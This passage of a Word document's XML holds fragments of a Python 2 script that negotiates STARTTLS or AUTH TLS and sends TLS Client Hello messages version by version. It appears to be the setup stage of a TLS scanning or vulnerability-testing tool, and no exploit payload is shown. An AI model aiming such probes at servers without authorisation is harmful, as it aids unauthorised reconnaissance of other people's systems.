    <w:p w14:paraId="297436BE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6A64DD01" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if "STARTTLS" in check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F623B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="43E8365E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A922F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7F46ED56" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print "STARTTLS command found"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0BFB65" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="69B834F8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "AUTH TLS" in check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD501C8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="38B240E1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296FCECF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="415D9139" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>atls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99101F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="340C5BFD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print "AUTH TLS command found"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5931D3DF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6799FF7B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EAF9FD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="66850C64" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print "STARTTLS command NOT found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19393BFC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="43BEFC5A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print '##################################################################'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E3DF51" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="10FAD901" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0263C625" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="48B5378F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2132AE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="73A223DC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                # send appropriate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command if supported                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E46A96E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="67DEBA33" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.starttls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669A1D2D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="415E41B5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.flush</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B87FB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4D6C901C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E15989" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5834D507" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        print 'Sending STLS Command...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD5BD5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="301908F8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("STLS\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B79DF0B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1D6E97BE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        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atls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C01955" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0298AC65" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print 'Sending AUTH TLS Command...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361A625A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2D3BF15D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("AUTH TLS\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA73F05" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7E299288" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE76504" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="171B1CCD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print 'Sending STARTTLS Command...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062CAFDB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7B630DB1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("STARTTLS\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221134CA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0922FC08" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2B7FCC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="05D27421" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        print 'Waiting for reply...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BDC03F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0B851BD0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.flush</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C88B5D6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="73B479DA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rcv_tls_record</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB3995A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1E0F06F6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="418AC92F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0454E44C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            supported = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C6F161" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3626F1CD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>num,tlsver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls_versions.items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F171DF7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="04E55411" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD6C0A7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="05A9B484" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstrun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7EEA84" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="51F7BD7E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    print 'Sending Client Hello for {}'.format(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tlsver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D6810" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="70FDE6C1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(hex2bin(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>build_client_hello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(num)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A7C1D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="76C84411" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE830B7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="15A1D618" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F02B3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7B377EC4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    print 'Waiting for Server Hello...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B071B38" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7AABEA1D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30415246" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="54FE0518" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3016565E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="63FC1629" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typ,ver,message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rcv_tls_record</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EAFDB5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4A13E84A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C3290F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="720B1DE8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F87380E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="717E44C7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                            print 'Server closed connection without sending </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ServerHello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for {}'.format(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tlsver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14218261" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="64936EEB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0713299B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="052FD8EF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        s = conn(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1F017" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3A845CBA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E61228" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4F53400D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == 22 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(message[0]) == 0x0E:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CD236B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="23D4918C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstrun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE05AE3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="360B84B1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                            print 'Received Server Hello for {}'.format(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tlsver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE460D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3A025310" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        supported = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06396DD9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6437D9EC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB02680" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="79C1C853" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                if supported: break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2F1177" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1ABDB8B5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7B63AD40" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="39FA649D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if not supported:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F2B852" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5B960119" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                print '\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>! No TLS versions supported!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B4F7B9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4D902D4D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                print '##################################################################'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F26CC8C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7E81EE13" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59973939" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="197B3652" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="26DFAFDF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6E6ACDCF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12666933" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7DDE8BB0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">                print '\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nSending</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
